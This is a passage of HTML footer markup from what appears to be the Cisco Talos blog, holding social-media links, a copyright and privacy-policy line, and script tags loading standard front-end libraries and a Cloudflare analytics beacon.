                            <img alt="Watch our informational videos on YouTube" src="https://blog.talosintelligence.com/assets/images/footer_icon_yt.svg?v=007426292d"/>
                        </a>
                    </li>
                    <li>
                        <a target="_blank" href="https://www.linkedin.com/company/cisco-talos-intelligence-group/" rel="nofollow">
                            <img alt="Connect with us on LinkedIn" src="https://blog.talosintelligence.com/assets/images/footer_icon_li.svg?v=007426292d">
                        </a>
                    </li>
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-sm-12 footer_corporate">
                <a href="http://tools.cisco.com/security/center/home.x" target="_blank">
                    <img src="https://blog.talosintelligence.com/assets/images/logo_cisco_white.svg?v=007426292d" alt="Cisco Security"/>
                </a>

                <p class="copyright">
                    &copy; <span id="current-year"></span> Cisco Systems, Inc. and/or its affiliates. All rights reserved. View our <a href="https://www.cisco.com/web/siteassets/legal/privacy_full.html" class="underline" target="_blank">Privacy Policy</a>
                </p>
            </div>
        </div>
    </div>
</footer>
    


<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://blog.talosintelligence.com/assets/js/jquery-3.6.0.min.js?v=007426292d"></script>
<script src="https://blog.talosintelligence.com/assets/js/popper.min.js?v=007426292d"></script>
<script src="https://blog.talosintelligence.com/assets/js/bootstrap.bundle.min.js?v=007426292d"></script>
<script src="https://blog.talosintelligence.com/assets/js/date.js?v=007426292d"></script>
<script src="https://cdn.jsdelivr.net/npm/ghost-theme-utils@latest/dist/js/ghost-theme-utils.min.js" async defer></script>

<script defer src="https://static.cloudflareinsights.com/beacon.min.js/v8b253dfea2ab4077af8c6f58422dfbfd1689876627854" integrity="sha512-bjgnUKX4azu3dLTVtie9u6TKqgx29RBwfj3QXYt5EKfWM/9hPSAI/4qcV5NACjwAo8UtTeWefx6Zq5PHcMm7Tg==" data-cf-beacon='{"rayId":"7fcbb2d5cccd0039","version":"2023.8.0","b":1,"token":"35f8ae698f9d471b83b846a751388737","si":100}' crossorigin="anonymous"></script>
</body>

</html>